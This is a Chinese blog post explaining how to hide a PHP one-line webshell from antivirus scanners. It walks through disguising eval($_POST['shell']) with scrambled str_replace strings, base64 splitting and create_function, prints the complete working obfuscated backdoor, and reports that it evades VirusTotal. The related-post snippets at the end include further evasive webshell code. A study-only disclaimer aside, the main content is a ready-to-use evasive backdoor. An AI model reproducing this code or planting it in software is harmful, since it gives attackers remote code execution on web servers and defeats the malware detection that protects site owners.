PHP一句话木马免杀(通过VirusTotal测试)

已于 2022-01-28 21:13:43 修改
阅读量3.4k 收藏 7
点赞数
文章标签: php web安全 安全
于 2022-01-28 21:02:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52233414/article/details/122736319
版权

PHP一句话木马免杀

仅用于学习与交流,请勿用于非法用途!!!

简介与思路

  • 免杀技术全称为反杀毒技术Anti Anti- Virus简称“免杀”,它指的是一种能使病毒木马免于被杀毒软件查杀的技术。

  • 其思路基本上都是修改病毒、木马的内容改变特征码,从而躲避了杀毒软件的查杀。说白了就是用各种各样的方法(比如拼接,编码,加密等)来隐藏关键代码。

流程

  • 先写出基本语句

<?php
eval($_POST['shell']);
?>

  • 准备几个函数来对基本语句进行伪装

<?php
eval($_POST['shell']);
$huan = str_replace("ac","","sactacrac_raceacpaclacaacce");
// 思路是先在str_replace中写好要构造的函数,
// 这里是打算把$huan这个变量当成str_replace函数来用
// 就先把第一三个参数填好,第一个随便填,第三个先填成要转换的目标
// 得$huan = str_replace("ac","","str_replace")
// 接着把第一个参数里面的东西随便插入进去
// 得$huan = str_replace("ac","","sactacrac_raceacpaclacaacce")
$jiemi = str_replace("bd","","bbdabdsbdebd64_dbdebdcbdobdde");
// 这里是打算把$jiemi这个变量当成base64_decode函数来用
$hanshu = str_replace("ef","","cefrefeefaeftefe_fefuefnefceftefiefoefn");
// 这里是打算把$hanshu这个变量当成create_function函数来用
?>

  • 把基本语句进行base64加密

$a="ZXZhbCgkX1BPU1RbJ3NoZWxsJ10pOw==";
// 把基本语句进行base64加密

  • 将加密后的语句拆分开

// 把基本语句进行base64加密,随便插入点字符
$s1="ZXZhbqwerCgkX1";
$s2="BPUqwer1RbJ3";
$s3="NoqwerZWxsJ";
$s4="10qwerpOw==";

  • 组装

$ans = $hanshu('',$jiemi($huan("qwer","",$s1.$s2.$s3.$s4)));
// 利用之前准备好的函数和字符串把需要的语句拼出来,拼成一个匿名函数

  • 调用

$ans();
// 调用这个函数

  • 完整代码

<?php
$huan = str_replace("ac","","sactacrac_raceacpaclacaacce");//密码是shell
// 思路是先在str_replace中写好要构造的函数,
// 这里是打算把$huan这个变量当成str_replace函数来用
// 就先把第一三个参数填好,第一个随便填,第三个先填成要转换的目标
// 得$huan = str_replace("ac","","str_replace")
// 接着把第一个参数里面的东西随便插入进去
// 得$huan = str_replace("ac","","sactacrac_raceacpaclacaacce")
$jiemi = $huan("bd","","bbdabdsbdebd64_dbdebdcbdobdde");
// 这里是打算把$jiemi这个变量当成base64_decode函数来用
$hanshu = $huan("ef","","cefrefeefaeftefe_fefuefnefceftefiefoefn");
// 这里是打算把$hanshu这个变量当成create_function函数来用
$s1="ZXZhbqwerCgkX1";
$s2="BPUqwer1RbJ3";
$s3="NoqwerZWxsJ";
$s4="10qwerpOw==";
// 将加密后的语句拆分开
$ans = $hanshu('',$jiemi($huan("qwer","",$s1.$s2.$s3.$s4)));
// 利用之前准备好的函数和字符串把需要的语句拼出来,拼成一个匿名函数
$ans();
// 调用这个函数
?>

可用性测试

 

可以发现这个马是可以用的

云沙箱测试

VirusTotal

结果非常理想

yumueat
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php简短一句话木马免杀,免杀/一句话木马(PHP)
weixin_39598568的博客
03-13 2326
前言在打CTF或渗透时,经常会遇到waf,普通的一句话木马便会被检测出来,打CTF还好,如果是渗透测试那么就有可能直接封IP,而且会发出报警信息。所以要掌握一句话木马免杀Webshell检测方式网上有很多免杀一句话木马,但是如果不知道主流杀毒或waf的检测方式,也只是类似爆破而已,运气好了能进去,运气不好就换下一个payload。因此在此之前,先来了解一下都有哪些检测方式。日志检测使用Web...
自用php一句话木马绝对免杀没有任何关键字
不是专家的专栏
11-14 1万+
该代码是本人自己编写,可变性极大,基本不可能被查杀,代码里面没有任何关键字,而且很容易把代码弄的非常复杂。 使用方法: 1.在网站建立一个xxx.php,内容放入一句话代码。(这里是演示,xxx.php可以是任何可以访问的文件) 2.建立一个demo.html,内容如下 textarea里面写上任何想执行php的代码,注意代码格式必须规范。--> phpinfo(
PHP一句话木马免杀学习
qq_45780190的博客
05-11 3055
PHP一句话木马免杀学习 简单了解php一句话木马原理 <?php @eval($_POST['shell']);?> 首先存在一个名为shell的变量,shell的取值为HTTP的POST方式。Web服务器对shell取值以后,然后通过eval()函数执行shell里面的内容。 将以上代码写入webshell.php文件中然后放在站点目录下通过浏览器访问,以POST方式传入shell=phpinfo(); 一句话木马的变形 常用变形函数 convert_uudecode() #解码一个
记一次多平台免杀PHP的制作过程
icewolf00的博客
01-20 2095
最开始萌生出写免杀WebShell的想法是这个月初上网时,偶然看到了阿里安全应急响应平台的一则线上活动“第三届伏魔恶意代码挑战赛”的报名公告,大致看了一下之后发现该比赛的内容为编写PHPJSPPython或Bash语言的后门代码,若编写的代码通过了阿里最新一代检测引擎(即挑战靶场)的检测,并且不和别的师傅重复之后就算比赛通过了。鉴于我对PHP语言和网络安全方面较为了解,于是我就抱着试一试的心态报名了PHP赛道。在奋战了4天之后,我编写出了一个215。
一句话木马免杀,看完99%的人都学会了
2401_83739727的博客
04-14 954
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
免杀
sweetie 的博客
04-12 826
一般的php一句话后门很容易被网站防火墙waf拦截,而waf通常通过判断关键字来辨别一句话木马,要想绕过waf就需要对木进行一些变形。(仅供分享经验,不可用作非法用途) 图片来源 一.先看一只有趣的小 <?php ($b4dboy = $_POST['b4dboy']) &&@preg_replace('/ad/e','@'.str_rot13('riny')."($b4dboy)", 'add'); ?> 沙箱检测它是安全文件 用D盾查杀只是发现可以的str_rot1
一句话木马要点和防范注意事项
最新发布
05-24
"一句话木马",顾名思义,是指利用简短的代码实现的恶意程序,它通常隐藏在网页、脚本或者其他可执行文件中,通过Web服务的漏洞进行植入,以达到远程控制或非法获取服务器权限的目的。这类木因为其简洁高效的特点...
php一句话cmdshell新型 (非一句话木马)
10-30
php运行时如果遇见字符``(键盘上~符号的下档键)总会尝试着执行``里面包含的命令,并返回命令执行的结果(string类型);
免杀只需要简单一句话php
02-12
免杀只需要简单的一句话代码php文件就可以轻松过,可以参考
一句话 asp木加密版 彻底突破杀毒软件
01-02
不知道怎样表达清楚。看例子吧: 代码如下:[removed] Execute(HextoStr(“65786563757465287265717565737428636872283335292929”)) Function HextoStr(data) HextoStr=”EXECUTE “”””” C=”&CHR(&H” N...
php免杀一句话,过主流waf
06-20
PHP语言异常灵活,日站的时候经常被waf拦截,于是花了点时间弄了个免杀PHP,减小了体积,测试安全狗云锁阿里云360主机卫士全都过。上传换点积分。没积分的在这儿下 https://pan.baidu.com/s/1dF5rfVF
免杀php
03-03
过目前所有市面的各类防御,仅供参考。切勿用于非法途径。
php超小免杀_超小PHP小结(方便查找后门的朋友)免杀
weixin_39579483的博客
12-30 842
作者: spider我也来个超小PHP复制代码 代码如下:header("content-Type: text/html; charset=gb2312");if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v);?>保存文件名: if(isset($_POST['file...
php一句话免杀尝试
qq_53263789的博客
02-24 617
<?php error_reporting(0); $a = rad2deg^(3).(2); $b = asin^(2).(6); $c = ceil^(1).(1); $exp = $a.$b.$c; //assert $pi=(is_nan^(6).(4)).(tan^(1).(5)); //_GET $pi=$$pi; //$_GET call_user_func($exp,$pi{0}($pi{1})); ?> 利用数学函数进行异或构造,从中寻找可用函数,没找到eval,找到了ass
绕过网站安全狗拦截,上传Webshell技巧总结(附免杀PHP一句话
xuchen16的博客
09-26 5819
转载自:http://www.freebuf.com/articles/web/125084.html *本文原创作者:1_2,本文属FreeBuf原创奖励计划,未经许可禁止转载 这篇文章我介绍一下我所知道的绕过网站安全狗上传WebShell的方法。 思路是:修改HTTP请求,构成畸形HTTP请求,然后绕过网站安全狗的检测。 废话不多说,切入正题。。。。 1、实验环境: Windows...
PHP免杀方法
wutiangui的博客
06-07 847
/ 函数变形 assert 达到免杀(免除杀毒软件识别)的效果:如。//将eval变形为evee。函数从字符串的两端删除空白字符和其他预定义字符。函数把字符串中每个单词的首字符转换为大写。函数把字符串的一部分替换为另一个字符串。函数把字符串中的首字符转换为大写。函数把字符串分割为更小的字符串。函数转换字符串中特定的字符。函数返回字符串的一部分。函数把字符串转换为大写。函数把字符串转换为小写。
PHP一句话木马集合
闵行小鱼塘
05-21 1万+
whoam1(QQ:2069698797)大佬早些年做的PHP一句话木马集合,在此记录下
整理的最新WebSHell (php过狗一句话,过狗菜刀,2016过狗一句话,2016php免杀一句话)
热门推荐
SetToken的博客
06-03 3万+
特别推荐的一个php一句话. 菜刀可以连接,过waf,过安全狗,D盾,360,php一句话木马带404页面,带MD5加密,可浏览器POST任意php代码执行.
php一句话木马免杀
08-03
总结来说,PHP一句话木马免杀是指通过一些技巧和手段来绕过安全检测,使木代码能够成功执行而不被发现。这些技巧包括设置执行时间限制、忽略用户中止请求、使用字符串替换和反转等。然而,这种行为是非法的,违反...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值